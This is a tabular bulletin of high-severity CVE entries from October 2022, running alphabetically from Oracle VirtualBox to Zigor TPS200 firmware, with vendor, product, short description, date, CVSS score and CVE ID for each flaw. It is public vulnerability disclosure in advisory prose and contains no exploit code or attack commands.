oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).	2022-10-18	8.8	CVE-2022-39427 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	8.1	CVE-2022-39424 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	8.1	CVE-2022-39425 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows unauthenticated attacker with network access via VRDP to compromise Oracle VM VirtualBox. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 8.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	8.1	CVE-2022-39426 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).	2022-10-18	7.5	CVE-2022-21620 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.38. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. While the vulnerability is in Oracle VM VirtualBox, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. CVSS 3.1 Base Score 7.5 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H).	2022-10-18	7.5	CVE-2022-39422 MISC
oracle — vm_virtualbox	Vulnerability in the Oracle VM VirtualBox product of Oracle Virtualization (component: Core). Supported versions that are affected are Prior to 6.1.40. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle VM VirtualBox executes to compromise Oracle VM VirtualBox. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle VM VirtualBox. Note: This vulnerability applies to Windows systems only. CVSS 3.1 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H).	2022-10-18	7.3	CVE-2022-39421 MISC
oracle — web_applications_desktop_integrator	Vulnerability in the Oracle Web Applications Desktop Integrator product of Oracle E-Business Suite (component: Upload). Supported versions that are affected are 12.2.3-12.2.11. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator. Successful attacks of this vulnerability can result in takeover of Oracle Web Applications Desktop Integrator. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).	2022-10-18	9.8	CVE-2022-39428 MISC
oringnet — iap-420+_firmware	On ORing net IAP-420(+) with FW version 2.0m a telnet server is enabled by default and cannot permanently be disabled. You can connect to the device with with hardcoded credentials and get an administrative shell. These credentials are reset to defaults with every reboot.	2022-10-21	8.8	CVE-2022-3203 CONFIRM
osgeo — shapelib	A double-free condition exists in contrib/shpsort.c of shapelib 1.5.0 and older releases. This issue may allow an attacker to cause a denial of service or have other unspecified impact via control over malloc.	2022-10-17	9.8	CVE-2022-0699 MISC MISC
otrs — otrs	Article template contents with sensitive data could be accessed from agents without permissions.	2022-10-17	7.5	CVE-2022-3501 MISC
oxhoo — tp50_firmware	An issue in OXHOO TP50 OXH1.50 allows unauthenticated attackers to access the administrative panel via browsing to the URL http://device_ip/index1.html.	2022-10-14	9.1	CVE-2022-41436 MISC
pctechsoft — pcsecure	In PCTechSoft PCSecure V5.0.8.xw, use of Hard-coded Credentials in configuration files leads to admin panel access.	2022-10-20	7.8	CVE-2022-42176 MISC
perfact — openvpn-client	An attacker can take leverage on PerFact OpenVPN-Client versions 1.4.1.0 and prior to send the config command from any application running on the local host machine to force the back-end server into initializing a new open-VPN instance with arbitrary open-VPN configuration. This could result in the attacker achieving execution with privileges of a SYSTEM user.	2022-10-14	8.8	CVE-2021-27406 CONFIRM
phoenixframework — phoenix	socket/transport.ex in Phoenix before 1.6.14 mishandles check_origin wildcarding. NOTE: LiveView applications are unaffected by default because of the presence of a LiveView CSRF token.	2022-10-17	7.5	CVE-2022-42975 MISC
phpmyfaq — phpmyfaq	Cross-site Scripting (XSS) – Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-alpha.	2022-10-19	8.4	CVE-2022-3608 CONFIRM MISC
phpok — phpok	Phpok 6.1 has a deserialization vulnerability via framework/phpok_call.php.	2022-10-18	9.8	CVE-2022-40889 MISC MISC
pytest — py	The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled.	2022-10-16	7.5	CVE-2022-42969 MISC MISC MISC
qualcomm — apq8009_firmware	memory corruption in video due to buffer overflow while parsing asf clips in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables	2022-10-19	9.8	CVE-2022-25687 CONFIRM
qualcomm — apq8009_firmware	Cryptographic issue in WLAN due to improper check on return value while authentication handshake in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	9.8	CVE-2022-25718 CONFIRM
qualcomm — apq8009_firmware	Memory corruption in WLAN due to out of bound array access during connect/roaming in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables	2022-10-19	9.8	CVE-2022-25720 CONFIRM
qualcomm — apq8009_firmware	Memory corruption in WLAN due to integer overflow to buffer overflow while parsing GTK frames. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	9.8	CVE-2022-25748 CONFIRM
qualcomm — apq8009_firmware	Information disclosure in WLAN due to improper length check while processing authentication handshake in Snapdragon Auto, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	9.1	CVE-2022-25719 CONFIRM
qualcomm — apq8009_firmware	Transient Denial-of-Service in WLAN due to buffer over-read while parsing MDNS frames. in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon IoT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	7.5	CVE-2022-25749 CONFIRM
qualcomm — apq8064au_firmware	Memory corruption in automotive multimedia due to use of out-of-range pointer offset while parsing command request packet with a very large type value. in Snapdragon Auto	2022-10-19	7.8	CVE-2022-33210 CONFIRM
qualcomm — apq8096au_firmware	Information disclosure due to untrusted pointer dereference in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables	2022-10-19	7.5	CVE-2022-25662 CONFIRM
qualcomm — aqt1000_firmware	Memory corruption due to double free issue in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile	2022-10-19	7.8	CVE-2022-25660 CONFIRM
qualcomm — aqt1000_firmware	Memory corruption due to untrusted pointer dereference in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile	2022-10-19	7.8	CVE-2022-25661 CONFIRM
qualcomm — aqt1000_firmware	Denial of service in WLAN due to out-of-bound read happens while processing VHT action frame in Snapdragon Auto, Snapdragon Compute, Snapdragon Connectivity, Snapdragon Consumer Electronics Connectivity, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Voice & Music, Snapdragon Wearables, Snapdragon Wired Infrastructure and Networking	2022-10-19	7.5	CVE-2022-25736 CONFIRM
qualcomm — aqt1000_firmware	Information disclosure due to buffer over read in kernel in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Mobile	2022-10-19	7.1	CVE-2022-25665 CONFIRM
qualcomm — aqt1000_firmware	Memory corruption in display due to time-of-check time-of-use of metadata reserved size in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile, Snapdragon Wearables	2022-10-19	7	CVE-2022-33214 CONFIRM
qualcomm — kailua_firmware	Memory corruption in BTHOST due to double free while music playback and calls over bluetooth headset in Snapdragon Mobile	2022-10-19	8.8	CVE-2022-25750 CONFIRM
qualcomm — sd_8_gen1_5g_firmware	Memory corruption in graphics due to use-after-free in graphics dispatcher logic in Snapdragon Mobile	2022-10-19	7.8	CVE-2022-22077 CONFIRM
qualcomm — sd_8_gen1_5g_firmware	Memory corruption in multimedia due to use after free during callback registration failure in Snapdragon Mobile	2022-10-19	7.8	CVE-2022-25723 CONFIRM
qualcomm — sd_8_gen1_5g_firmware	Memory corruption in Qualcomm IPC due to buffer copy without checking the size of input while starting communication with a compromised kernel. in Snapdragon Mobile	2022-10-19	7.8	CVE-2022-33217 CONFIRM
redhat — 3scale_api_management	3scale API Management 2 does not perform adequate sanitation for user input in multiple fields. An authenticated user could use this flaw to inject scripts and possibly gain access to sensitive information or conduct further attacks.	2022-10-19	8.8	CVE-2022-1414 MISC MISC
redhat — decision_manager	A flaw was found in the RHDM, where an authenticated attacker can change their assigned role in the response header. This flaw allows an attacker to gain admin privileges in the Business Central Console.	2022-10-17	8.8	CVE-2019-14841 MISC MISC
redhat — decision_manager	A flaw was found in the RHDM, where sensitive HTML form fields like Password has auto-complete enabled which may lead to leak of credentials.	2022-10-17	7.5	CVE-2019-14840 MISC MISC
redhat — openshift	The deployment script in the unsupported “OpenShift Extras” set of add-on scripts, in Red Hat Openshift 1, installs a default public key in the root user’s authorized_keys file.	2022-10-19	7.5	CVE-2013-4253 MISC MISC
rockwellautomation — factorytalk_vantagepoint	Rockwell Automation FactoryTalk VantagePoint versions 8.0, 8.10, 8.20, 8.30, 8.31 are vulnerable to an input validation vulnerability. The FactoryTalk VantagePoint SQL Server lacks input validation when users enter SQL statements to retrieve information from the back-end database. If successfully exploited, this could allow a user with basic user privileges to perform remote code execution on the server.	2022-10-17	8.8	CVE-2022-3158 MISC
rockwellautomation — factorytalk_vantagepoint	Rockwell Automation FactoryTalk VantagePoint versions 8.0, 8.10, 8.20, 8.30, 8.31 are vulnerable to an improper access control vulnerability. The FactoryTalk VantagePoint SQL Server account could allow a malicious user with read-only privileges to execute SQL statements in the back-end database. If successfully exploited, this could allow the attacker to execute arbitrary code and gain access to restricted data.	2022-10-17	8.8	CVE-2022-38743 MISC
sanitization_management_system_project — sanitization_management_system	A vulnerability was found in SourceCodester Sanitization Management System and classified as critical. This issue affects some unknown processing of the file /php-sms/?p=services/view_service. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-210839.	2022-10-14	9.8	CVE-2022-3504 N/A N/A
shinken-monitoring — shinken_monitoring	Shinken Solutions Shinken Monitoring Version 2.4.3 affected is vulnerable to Incorrect Access Control. The SafeUnpickler class found in shinken/safepickle.py implements a weak authentication scheme when unserializing objects passed from monitoring nodes to the Shinken monitoring server.	2022-10-20	9.8	CVE-2022-37298 MISC MISC
siemens — teamcenter_visualization	The APDFL.dll in Siemens JT2Go prior to V13.3.0.5 and Siemens Teamcenter Visualization prior to V14.0.0.2 contains an out of bounds write past the fixed-length heap-based buffer while parsing specially crafted PDF files. This could allow an attacker to execute code in the context of the current process.	2022-10-20	7.8	CVE-2022-2069 CONFIRM CONFIRM
simple_cold_storage_management_system_project — simple_cold_storage_management_system	A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /csms/admin/?page=user/manage_user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-211049 was assigned to this vulnerability.	2022-10-17	7.2	CVE-2022-3549 N/A N/A
simple_cold_storage_management_system_project — simple_cold_storage_management_system	Simple Cold Storage Management System v1.0 is vulnerable to SQL Injection via /csms/classes/Master.php?f=delete_storage.	2022-10-14	7.2	CVE-2022-42232 MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system	In Simple Exam Reviewer Management System v1.0 the User List function suffers from insecure file upload.	2022-10-20	8.8	CVE-2022-42198 MISC MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system	Simple Exam Reviewer Management System v1.0 is vulnerable to Cross Site Request Forgery (CSRF) via the Exam List.	2022-10-20	8.8	CVE-2022-42199 MISC MISC MISC
simple_exam_reviewer_management_system_project — simple_exam_reviewer_management_system	Simple Exam Reviewer Management System v1.0 is vulnerable to Insecure file upload.	2022-10-20	7.2	CVE-2022-42201 MISC MISC
smackcoders — an_ultimate_wordpress_importer_cum_migration_as_csv_&_xml	The Import all XML, CSV & TXT WordPress plugin before 6.5.8 does not properly sanitise and escape imported data before using them back SQL statements, leading to SQL injection exploitable by high privilege users such as admin	2022-10-17	7.2	CVE-2022-3243 MISC
solarwinds — orion_platform	SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands.	2022-10-20	8.8	CVE-2022-36958 MISC MISC
solarwinds — orion_platform	SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.	2022-10-20	7.2	CVE-2022-36957 MISC MISC
solarwinds — orion_platform	SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with Orion admin-level account access to SolarWinds Web Console to execute arbitrary commands.	2022-10-20	7.2	CVE-2022-38108 MISC MISC
synacor — zimbra_collaboration_suite	Due to an issue with incorrect sudo permissions, Zimbra Collaboration Suite (ZCS) suffers from a local privilege escalation issue in versions 9.0.0 and prior, where the ‘zimbra’ user can effectively coerce postfix into running arbitrary commands as ‘root’.	2022-10-17	7.8	CVE-2022-3569 MISC MISC MISC
synology — diskstation_manager	A vulnerability regarding improper restriction of operations within the bounds of a memory buffer is found in the packet decryption functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500.	2022-10-20	9.8	CVE-2022-27624 CONFIRM
synology — diskstation_manager	A vulnerability regarding improper restriction of operations within the bounds of a memory buffer is found in the message processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500.	2022-10-20	9.8	CVE-2022-27625 CONFIRM
synology — diskstation_manager	A vulnerability regarding concurrent execution using shared resource with improper synchronization (‘Race Condition’) is found in the session processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to execute arbitrary commands via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500.	2022-10-20	8.1	CVE-2022-27626 CONFIRM
synology — diskstation_manager	A vulnerability regarding out-of-bounds read is found in the session processing functionality of Out-of-Band (OOB) Management. This allows remote attackers to obtain sensitive information via unspecified vectors. The following models with Synology DiskStation Manager (DSM) versions before 7.1.1-42962-2 may be affected: DS3622xs+, FS3410, and HD6500.	2022-10-20	7.5	CVE-2022-3576 CONFIRM
tableau — tableau_server	Tableau discovered a path traversal vulnerability affecting Tableau Server Administration Agent’s internal file transfer service that could allow remote code execution.Tableau only supports product versions for 24 months after release. Older versions have reached their End of Life and are no longer supported. They are also not assessed for potential security issues and do not receive security updates.	2022-10-17	9.8	CVE-2022-22128 MISC MISC
tenda — 11n_firmware	Tenda 11N with firmware version V5.07.33_cn suffers from an Authentication Bypass vulnerability.	2022-10-20	9.8	CVE-2022-42233 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromNatStaticSetting.	2022-10-17	9.8	CVE-2022-42163 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetClientState.	2022-10-17	9.8	CVE-2022-42164 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetDeviceName.	2022-10-17	9.8	CVE-2022-42165 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetSpeedWan.	2022-10-17	9.8	CVE-2022-42166 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formSetFirewallCfg.	2022-10-17	9.8	CVE-2022-42167 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/fromSetIpMacBind.	2022-10-17	9.8	CVE-2022-42168 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/addWifiMacFilter.	2022-10-17	9.8	CVE-2022-42169 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/formWifiWpsStart.	2022-10-17	9.8	CVE-2022-42170 MISC
tenda — ac10_firmware	Tenda AC10 V15.03.06.23 contains a Stack overflow vulnerability via /goform/saveParentControlInfo.	2022-10-17	9.8	CVE-2022-42171 MISC
tenda — ac15_firmware	Tenda AC15 V15.03.05.18 was discovered to contain a stack overflow via the timeZone parameter in the form_fast_setting_wifi_set function.	2022-10-18	7.5	CVE-2022-43259 MISC
tenda — ac18_firmware	Tenda AC18 V15.03.05.19(6318) was discovered to contain a stack overflow via the time parameter in the fromSetSysTime function.	2022-10-18	9.8	CVE-2022-43260 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the list parameter at /goform/SetVirtualServerCfg.	2022-10-19	9.8	CVE-2022-43024 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the startIp parameter at /goform/SetPptpServerCfg.	2022-10-19	9.8	CVE-2022-43025 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the endIp parameter at /goform/SetPptpServerCfg.	2022-10-19	9.8	CVE-2022-43026 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the firewallEn parameter at /goform/SetFirewallCfg.	2022-10-19	9.8	CVE-2022-43027 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the timeZone parameter at /goform/SetSysTimeCfg.	2022-10-19	9.8	CVE-2022-43028 MISC
tenda — tx3_firmware	Tenda TX3 US_TX3V1.0br_V16.03.13.11_multi_TDE01 was discovered to contain a stack overflow via the time parameter at /goform/SetSysTimeCfg.	2022-10-19	9.8	CVE-2022-43029 MISC
thoughtworks — gocd	GoCD is a continuous delivery server. GoCD helps you automate and streamline the build-test-release cycle for continuous delivery of your product. GoCD versions prior to 21.1.0 are vulnerable to remote code execution on the server from a malicious or compromised agent. The Spring RemoteInvocation endpoint exposed agent communication and allowed deserialization of arbitrary java objects, as well as subsequent remote code execution. Exploitation requires agent-level authentication, thus an attacker would need to either compromise an existing agent, its network communication or register a new agent to practically exploit this vulnerability. This issue is fixed in GoCD version 21.1.0. There are currently no known workarounds.	2022-10-14	8.8	CVE-2022-39311 CONFIRM MISC MISC
tp-link — ax10_firmware	TP-Link AX10v1 V1_211117 allows attackers to execute a replay attack by using a previously transmitted encrypted authentication message and valid authentication token. Attackers are able to login to the web application as an admin user.	2022-10-18	8.1	CVE-2022-41541 MISC MISC
trumpf — job_order_interface	Multiple Trumpf Products in multiple versions use default privileged Windows users and passwords. An adversary may use these accounts to remotely gain full access to the system.	2022-10-17	9.8	CVE-2022-2052 CONFIRM
ucms_project — ucms	There is a file inclusion vulnerability in the template management module in UCMS 1.6	2022-10-14	8.8	CVE-2022-42234 MISC
uglifyjs_project — uglifyjs	Prototype pollution vulnerability in function DEFNODE in ast.js in mishoo UglifyJS 3.13.2 via the name variable in ast.js.	2022-10-20	9.8	CVE-2022-37598 MISC MISC MISC
verint — desktop_and_process_analytics	The MSI installer in Verint Desktop Resources 15.2 allows an unprivileged local user to elevate their privileges during install or repair.	2022-10-20	7.8	CVE-2020-12744 MISC MISC
villatheme — dropshipping_and_fulfillment_for_aliexpress_and_woocommerce	Sensitive Data Exposure in Villatheme ALD – AliExpress Dropshipping and Fulfillment for WooCommerce premium plugin <= 1.1.0 on WordPress.	2022-10-14	7.5	CVE-2022-41623 CONFIRM CONFIRM
wago — 750-8100_firmware	WAGO Series PFC100/PFC200, Series Touch Panel 600, Compact Controller CC100 and Edge Controller in multiple versions are prone to a loss of MAC-Address-Filtering after reboot. This may allow an remote attacker to circumvent the reach the network that should be protected by the MAC address filter.	2022-10-17	7.5	CVE-2022-3281 CONFIRM
webidsupport — webid	A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories.	2022-10-14	9.1	CVE-2022-41477 MISC
webpack.js — loader-utils	A Regular expression denial of service (ReDoS) flaw was found in Function interpolateName in interpolateName.js in webpack loader-utils 2.0.0 via the url variable in interpolateName.js.	2022-10-14	7.5	CVE-2022-37603 MISC MISC MISC
wedding_planner_project — wedding_planner	Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /Wedding-Management-PHP/admin/photos_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-14	8.8	CVE-2022-41538 MISC
wedding_planner_project — wedding_planner	Wedding Planner v1.0 was discovered to contain an arbitrary file upload vulnerability in the component /admin/users_add.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file.	2022-10-14	8.8	CVE-2022-41539 MISC
wire — wire_server	Wire is an encrypted communication and collaboration platform. Versions prior to 2022-07-12/Chart 4.19.0 are subject to Token Recipient Confusion. If an attacker has certain details of SAML IdP metadata, and configures their own SAML on the same backend, the attacker can delete all SAML authenticated accounts of a targeted team, Authenticate as a user of the attacked team and create arbitrary accounts in the context of the team if it is not managed by SCIM. This issue is fixed in wire-server 2022-07-12 and is already deployed on all Wire managed services. On-premise instances of wire-server need to be updated to 2022-07-12/Chart 4.19.0, so that their backends are no longer affected. As a workaround, the risk of an attack can be reduced by disabling SAML configuration for teams (galley.config.settings.featureFlags.sso). Helm overrides are located in `values/wire-server/values.yaml` Note that the ability to configure SAML SSO as a team is disabled by default for on-premise installations.	2022-10-18	8.1	CVE-2022-31122 CONFIRM
wisa — smart_wing_cms	This vulnerability could allow a remote attacker to execute remote commands with improper validation of parameters of certain API constructors. Remote attackers could use this vulnerability to execute malicious commands such as directory traversal.	2022-10-17	9.8	CVE-2022-23770 MISC
wordpress — wordpress	A flaw was found in WordPress 5.1. “X-Forwarded-For” is a HTTP header used to carry the client’s original IP address. However, because these headers may very well be added by the client to the requests, if the systems/devices use IP addresses which decelerate at X-Forwarded-For header instead of original IP, various issues may be faced. If the data originating from these fields is trusted by the application developers and processed, any authorization checks originating IP address logging could be manipulated.	2022-10-17	9.8	CVE-2020-35539 MISC
wp_custom_cursors_project — wp_custom_cursors	The WP Custom Cursors WordPress plugin through 3.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privileged users such as admin	2022-10-17	7.2	CVE-2022-3150 MISC
x.org — libx11	A vulnerability has been found in X.org libX11 and classified as problematic. This vulnerability affects the function _XimRegisterIMInstantiateCallback of the file modules/im/ximcp/imsClbk.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211054 is the identifier assigned to this vulnerability.	2022-10-17	7.5	CVE-2022-3554 N/A N/A
x.org — libx11	A vulnerability was found in X.org libX11 and classified as problematic. This issue affects the function _XFreeX11XCBStructure of the file xcb_disp.c. The manipulation of the argument dpy leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211055.	2022-10-17	7.5	CVE-2022-3555 N/A N/A
x.org — x_server	A vulnerability classified as critical was found in X.org Server. Affected by this vulnerability is the function _GetCountedString of the file xkb/xkb.c. The manipulation leads to buffer overflow. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211051.	2022-10-17	9.8	CVE-2022-3550 N/A N/A
x.org — x_server	A vulnerability, which was classified as problematic, has been found in X.org Server. Affected by this issue is the function ProcXkbGetKbdByName of the file xkb/xkb.c. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211052.	2022-10-17	7.5	CVE-2022-3551 N/A N/A
x.org — x_server	A vulnerability, which was classified as problematic, was found in X.org Server. This affects an unknown part of the file hw/xquartz/X11Controller.m of the component xquartz. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier VDB-211053 was assigned to this vulnerability.	2022-10-17	7.5	CVE-2022-3553 N/A N/A
xbifrost — bifrost	Bifrost is a heterogeneous middleware that synchronizes MySQL, MariaDB to Redis, MongoDB, ClickHouse, MySQL and other services for production environments. Versions prior to 1.8.8-release are subject to authentication bypass in the admin and monitor user groups by deleting the X-Requested-With: XMLHttpRequest field in the request header. This issue has been patched in 1.8.8-release. There are no known workarounds.	2022-10-19	8.8	CVE-2022-39267 CONFIRM MISC
zigor — zgr_tps200_ng_firmware	In ZGR TPS200 NG 2.00 firmware version and 1.01 hardware version, the firmware upload process does not perform any type of restriction. This allows an attacker to modify it and re-upload it via web with malicious modifications, rendering the device unusable.	2022-10-17	9.1	CVE-2020-8974 CONFIRM
zigor — zgr_tps200_ng_firmware	The integrated server of the ZGR TPS200 NG on its 2.00 firmware version and 1.01 hardware version, allows a remote attacker to perform actions with the permissions of a victim user. For this to happen, the victim user has to have an active session and triggers the malicious request.	2022-10-17	8.8	CVE-2020-8976 CONFIRM
zigor — zgr_tps200_ng_firmware	ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, does not properly accept specially constructed requests. This allows an attacker with access to the network where the affected asset is located, to operate and change several parameters without having to be registered as a user on the web that owns the device.	2022-10-17	8.1	CVE-2020-8973 CONFIRM
zigor — zgr_tps200_ng_firmware	ZGR TPS200 NG in its 2.00 firmware version and 1.01 hardware version, allows a remote attacker with access to the web application and knowledge of the routes (URIs) used by the application, to access sensitive information about the system.	2022-10-17	7.5	CVE-2020-8975 CONFIRM
